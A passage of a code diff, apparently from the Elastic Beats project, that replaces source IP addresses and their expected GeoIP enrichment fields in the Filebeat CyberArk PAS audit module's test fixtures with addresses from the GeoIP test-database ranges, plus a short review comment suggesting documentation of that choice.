 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMPGW_localhost.localdomain"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -127,7 +121,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_localhost.localdomain",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
 "event.action": "add user",
 "event.category": [
@@ -147,29 +141,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1161,
+ "log.offset": 1159,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMP_ADB_localhost.localdomain"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -186,7 +177,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:19",
 "event.action": "add user",
 "event.category": [
@@ -206,29 +197,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1743,
+ "log.offset": 1740,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMApp_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -245,7 +233,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:27",
 "event.action": "add user",
 "event.category": [
@@ -265,29 +253,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2309,
+ "log.offset": 2305,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMGw_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -304,7 +289,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMApp_ASR-WIN",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:06",
 "event.action": "add user",
 "event.category": [
@@ -324,28 +309,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2874,
+ "log.offset": 2869,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "related.user": [
 "PSMApp_ASR-WIN"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -362,7 +345,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMGw_ASR-WIN",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:15",
 "event.action": "add user",
 "event.category": [
@@ -382,28 +365,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3440,
+ "log.offset": 3434,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "related.user": [
 "PSMGw_ASR-WIN"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -417,11 +398,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:36Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add User",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.14\n \n \n \n \n \n Add User\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPApp_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 08:59:36",
 "event.action": "add user",
 "event.category": [
@@ -441,29 +422,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4005,
+ "log.offset": 3998,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMPApp_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -477,11 +455,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:36Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add User",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.14\n \n \n \n \n \n Add User\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 08:59:36",
 "event.action": "add user",
 "event.category": [
@@ -501,29 +479,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5419,
+ "log.offset": 5410,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "PSMPGW_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -537,11 +512,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add User",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_SSH",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
 "event.action": "add user",
 "event.category": [
@@ -561,26 +536,29 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6831,
+ "log.offset": 6820,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "related.user": [
 "PSMPGW_SSH"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -594,11 +572,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add User",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPApp_SSH",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
 "event.action": "add user",
 "event.category": [
@@ -618,26 +596,29 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8235,
+ "log.offset": 8220,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "related.user": [
 "PSMPApp_SSH"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -651,11 +632,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:21Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add User",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_asr-cyberark-psm-ssh",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:21",
 "event.action": "add user",
 "event.category": [
@@ -675,26 +656,29 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 9641,
+ "log.offset": 9622,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "related.user": [
 "PSMP_ADB_asr-cyberark-psm-ssh"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
index 93d8a45a00e8..f0502e8121d3 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}}
+<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
index 6c43cfdf699f..e4d40a8d853d 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
@@ -9,7 +9,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:15:44",
 "event.action": "update safe",
 "event.code": "181",
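Review bot: The new `Station` value 67.43.156.14 on the added line is only meaningful together with the GeoIP database the module tests enrich against, which is what the Bhutan/London geo fields in the updated expected files appear to reflect, yet nothing alongside the fixtures records why these particular addresses were chosen. A one-line note next to the fixtures, such as `# Fixture addresses are taken from the GeoIP test-database ranges (67.43.156.0/24, 81.2.69.0/24); do not use real hosts`, would keep future samples from reintroducing attributable addresses and would explain the expected geo output when it differs from a production database. The same applies to every `*.log` fixture touched by this commit.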
@@ -28,19 +28,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
index 21a17a2c729e..b74b3a9e7168 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:13Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.14\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
index e84c490f6281..c93c6761e68e 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
@@ -9,7 +9,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add safe",
 "event.code": "185",
@@ -28,19 +28,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -53,11 +50,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:13Z",
 "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.message": "Add Safe",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n",
